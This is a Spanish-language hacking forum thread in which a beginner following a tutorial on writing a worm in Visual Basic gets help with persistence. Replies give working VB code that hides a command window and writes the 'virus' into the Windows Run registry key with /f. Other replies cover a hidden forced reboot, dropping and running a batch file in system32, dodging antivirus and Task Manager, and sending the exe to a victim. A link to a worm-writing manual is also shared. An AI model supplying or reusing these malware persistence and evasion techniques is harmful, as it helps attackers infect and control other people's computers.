hola.felicitaciones por esta fantastica web
me he descargado el tutorial de como crear un worm en vb hecho por Hendrix.pero no entiendo una cosa:Para que nuestro "bicho" se ejekute en kada sesion se puede hacer "puramente" en VB, aunke
yo por komodidad lo hago en Batch (es mucho mas corto), para hacerlo en batch tenemos que
rekordar que desde el VB podemos ejekutar comandos del MS-dos haciendo esto:
Código:
Shell "cmd.exe /c comandodelMS-dos"
no entiendo ese codigo.donde hay que ponerlo????
Shell = es para ejecutar un archivo.
cmd.exe = es la consola
el /c = es para que una vez ejecutada la orden el cmd.exe se cierre.
comandodelMS-dos = es la orden que se va a ejecutar.
lo de poner ya seria por el propio tutorial ya que se puede poner en los sitios que te de la gana :xD...ej:
Private Sub Form_Load()
Shell "cmd.exe /c shutdown -r -t 30" 'esto reinicia el ordenata despues de 30seg
End Sub
Saludos
No hace falta poner cmd.exe, ese code puede quedar asi:
Private Sub Form_Load()
Shell ("shutdown -r -t 30"),vbhide 'esto reinicia el ordenata despues de 30seg y hace que la ventana ms-dos permanezca oculta
End Sub
Salu2
entonces como seria este?(se supone que hes pa guardarlo en el registro)
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"
gracias por vuestras respuestas
Cita de: º€duhAcKº en 1 Enero 2008, 18:41 PM
No hace falta poner cmd.exe, ese code puede quedar asi:
Private Sub Form_Load()
Shell ("shutdown -r -t 30"),vbhide 'esto reinicia el ordenata despues de 30seg y hace que la ventana ms-dos permanezca oculta
End Sub
Salu2
Con ese comando no hace falta poner el cmd.exe /c por q en realidad no es un comando como tal, es la ejecucion de un archivo de system 32, pero para hacer un dir por ejemplo si q tienes q ponerlo ;)
El q dices x3non, fijate en la ayuda q trae el propio comando y pon cada cosa donde te interesa:
CitarC:\>reg add -h
Herramienta de registro de consola para Windows - versión 3.0
Copyright (C) Microsoft Corp. 1981-2001. Reservados todos los derechos
REG ADD clave [/v nvalor | /ve] [/t tipo] [/s separador] [/d datos] [/f]
clave [\\equipo\]tclave
Equipo nombre del equipo remoto. Si se omite se usa el
equipo actual. Sólo HKLM y HKU están disponibles
para equipos remotos.
tclave CLAVERAIZ\subclave
CLAVERAIZ [ HKLM | HKCU | HKCR | HKU | HKCC ]
subclave Nombre completo de una clave de registro en la
CLAVERAIZ seleccionada.
/v Nombre del valor en la clave seleccionada para agregar
/ve Agrega el nombre de valor vacío <sin nombre>
/t Tipos de datos de clave de registro
[ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN |
REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN |
REG_NONE | REG_EXPAND_SZ ]
Si se omite, se asume REG_SZ
/s Especifica el carácter que usa como separador en su cadena
de datos para REG_MULTI_SZ. Si se omite, se usa "\0" como
separador
/d Datos que se asignan a nvalor del registro que se agrega
/f Fuerza la sobrescritura de entradas de registro existentes
sin avisar.
Ejemplos:
REG ADD \\ABC\HKLM\Software\MiCo
Agrega una clave HKLM\Software\MiCo en el equipo remoto ABC
REG ADD HKLM\Software\MiCo /v datos /t REG_BINARY /d fe340ead
Agrega un valor (nombre: datos, tipo: REG_BINARY, datos: fe340ead)
REG ADD HKLM\Software\MiCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Agrega un valor (nombre: MRU, tipo: REG_MUTLI_SZ, datos: fax\0mail\0\0)
REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%%
Agrega un valor (nombre: Path, tipo: REG_EXPAND_SZ, datos: %systemroot%)
Nota: use porcentaje doble ( %% ) dentro de la cadena expandida
Saludos
Pues te quedaría asi:
Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"),vbhide
Asi se añade al registro y la ventana ms-dos no se ve cuando se ejecuta.
Salu2
A por cierto, q ya se me olvidaba, si no te kieres complicar en cada inicio en comprobar si la clave del reg existe y si no existe sustituirla, simplemente añade un /f a lo q te a puesto º€duhAcKº q si no se ven procesos en el admin de tareas ;)
Entonces si la sutituyes cada vez que la ejecutas no se ve en el admin? Yo lo hacía copiando el exe a windows, y en el codigo comprobaba si el exe existia, si existe es que la calve ya la é copiado y si no existe lo copio a windows y lo añado. Entonces si la sutituyes cada vez que la ejecutas no se ve en el admin? Porque mi problema fue el KAV con su proactiva, ya que pedia confirmación al añadir info al registro, y el el titulo se podía leer "Trojan.Droper"... :(
Salu2
Cita de: º€duhAcKº en 2 Enero 2008, 11:47 AM
Pues te quedaría asi:
Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe"),vbhide
Asi se añade al registro y la ventana ms-dos no se ve cuando se ejecuta.
Salu2
pero si pongo eso me sale error de compilacion.no tendria que poner delante de eso lo de Private Sub y todo eso????
esque no llevo mucho tiempo con el vb y no me aclaro mucho
Pues claro, pero eso es cosa tuya, si quieres que se añada al cargarlo quedaría asi:
Private sub form_load ()
Shell ("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
NOMBREDENUESTROVIRUS /d Rutadenuestrovirus.exe /f"),vbhide
End Sub
Salu2
ok
muchas gracias por tu ayuda
aqui dejo el manual haber que puedes comentar un poco sobre el y darme tu opinion
http://rapidshare.com/files/80674567/Creacion_de_Worms_VB_by_Hendrix.pdf.html
un pequeño detalle este worm se hace en exe estandar?
Si, ya conocía el manual de Hendrix,y si, si lo haces en vb lo compila a exe, aunque en el code, el propo exe compila algunos bat que tienen funciones, por ejemplo:
Open "C:\windows\system32\winlog.bat" for output as as #2
Esto crea un bat
Shell("C:\windows\system32\winlog.bat"),vbhide
Esto ejecuta el bat
Pero los bats están incluidos el el exe, por lo que si se lo mandas a alguien solo hay que enviar e exe (espero no haberte liado) ;)
Salu2